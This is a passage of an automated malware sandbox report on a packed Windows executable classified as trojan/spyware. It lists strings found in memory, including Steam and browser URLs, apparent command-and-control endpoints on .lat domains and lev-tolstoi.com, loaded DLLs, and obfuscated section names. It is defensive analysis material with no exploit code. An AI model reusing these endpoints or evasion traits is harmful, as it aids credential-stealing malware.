                Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: jSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                Source: jSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: jSFUzuYPG9.exe, 00000000.00000002.1978820464.0000000005EA0000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1978648025.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://energyaffai.lat/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://energyaffai.lat:443/api=
                Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat:443/api$
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CbW4pDk4pbW4CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449631848.0000000005DE9000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496926553.0000000005DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/$
                Source: jSFUzuYPG9.exe, 00000000.00000003.1499562858.00000000016AD000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496634027.00000000016AD000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/(
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377203938.0000000001643000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/;#
                Source: jSFUzuYPG9.exe, 00000000.00000003.1503367949.00000000016AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/X236
                Source: jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1427112957.0000000005DF2000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                Source: jSFUzuYPG9.exe, 00000000.00000003.1503367949.00000000016AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api8
                Source: jSFUzuYPG9.exe, 00000000.00000003.1496559642.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496926553.0000000005DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/cE
                Source: jSFUzuYPG9.exe, 00000000.00000003.1474837277.0000000005DEB000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474953402.0000000005DF0000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496559642.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496926553.0000000005DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/h
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                Source: jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/x
                Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/api
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.s7
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacebudi.lat:443/api
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                Source: jSFUzuYPG9.exe, 00000000.00000002.1978648025.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                Source: jSFUzuYPG9.exe, 00000000.00000002.1978648025.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.nP
                Source: jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.000000000160C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Per
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1451620554.0000000005F0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: jSFUzuYPG9.exe, 00000000.00000003.1451620554.0000000005F0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1326699154.000000000164A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sustainskelet.lat/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1326699154.000000000164A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sustainskelet.lat/api
                Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sustainskelet.lat/d
                Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sustainskelet.lat:443/apis
                Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sweepyribs.lat:443/api
                Source: jSFUzuYPG9.exe, 00000000.00000002.1978820464.0000000005EA0000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1978648025.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                Source: jSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_f6f292994d7c60be109e4c185cbc03032d36d17160d4e639
                Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                Source: jSFUzuYPG9.exe, 00000000.00000003.1451620554.0000000005F0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.8Z86fTxZfkM6
                Source: jSFUzuYPG9.exe, 00000000.00000003.1451620554.0000000005F0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.UnUp0v0CLe9Y
                Source: jSFUzuYPG9.exe, 00000000.00000003.1451620554.0000000005F0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: jSFUzuYPG9.exe, 00000000.00000003.1451620554.0000000005F0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: jSFUzuYPG9.exe, 00000000.00000003.1451620554.0000000005F0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/

                System Summary

                Source: jSFUzuYPG9.exe Static PE information: section name:
                Source: jSFUzuYPG9.exe Static PE information: section name: .rsrc
                Source: jSFUzuYPG9.exe Static PE information: section name: .idata
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Code function: 0_3_016AF430 0_3_016AF430
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7428 -s 2140
                Source: jSFUzuYPG9.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: jSFUzuYPG9.exe Static PE information: Section: ZLIB complexity 0.9974114404965754
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@2/5@13/4
                Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7428
                Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\f51efc0a-74d9-4ec7-9c39-26d8e1893b37
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: jSFUzuYPG9.exe, 00000000.00000003.1403414219.0000000005E1A000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1428084440.0000000005E11000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403726937.0000000005DFC000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1427969651.0000000005E1B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: jSFUzuYPG9.exe ReversingLabs: Detection: 63%
                Source: jSFUzuYPG9.exe Virustotal: Detection: 50%
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File read: C:\Users\user\Desktop\jSFUzuYPG9.exe
                Source: unknown Process created: C:\Users\user\Desktop\jSFUzuYPG9.exe "C:\Users\user\Desktop\jSFUzuYPG9.exe"
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: webio.dll
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: ncryptsslp.dll
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: dpapi.dll
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: wbemcomn.dll
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: version.dll
                Source: jSFUzuYPG9.exe Static file information: File size 2870272 > 1048576
                Source: jSFUzuYPG9.exe Static PE information: Raw size of trstwfmm is bigger than: 0x100000 < 0x294c00

                Data Obfuscation

                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Unpacked PE file: 0.2.jSFUzuYPG9.exe.c50000.0.unpack :EW;.rsrc :W;.idata :W;trstwfmm:EW;ekycdelp:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;trstwfmm:EW;ekycdelp:EW;.taggant:EW;
                Source: initial sample Static PE information: section where entry point is pointing to: .taggant
                Source: jSFUzuYPG9.exe Static PE information: real checksum: 0x2c69ff should be: 0x2c313f
                Source: jSFUzuYPG9.exe Static PE information: section name:
                Source: jSFUzuYPG9.exe Static PE information: section name: .rsrc
                Source: jSFUzuYPG9.exe Static PE information: section name: .idata
                Source: jSFUzuYPG9.exe Static PE information: section name: trstwfmm
                Source: jSFUzuYPG9.exe Static PE information: section name: ekycdelp
                Source: jSFUzuYPG9.exe Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Code function: 0_3_016B2E78 push esp; ret 0_3_016B2E79
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Code function: 0_3_016B2E48 push edx; ret 0_3_016B2E49
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Code function: 0_3_016B4E4C push ecx; iretd 0_3_016B4E51
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Code function: 0_3_016ACE40 pushad ; iretd 0_3_016ACE41
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Code function: 0_3_016AD158 pushad ; iretd 0_3_016AD159
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Code function: 0_3_016B1150 pushad ; iretd 0_3_016B1159
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Code function: 0_3_016ACE55 pushad ; iretd 0_3_016ACE59
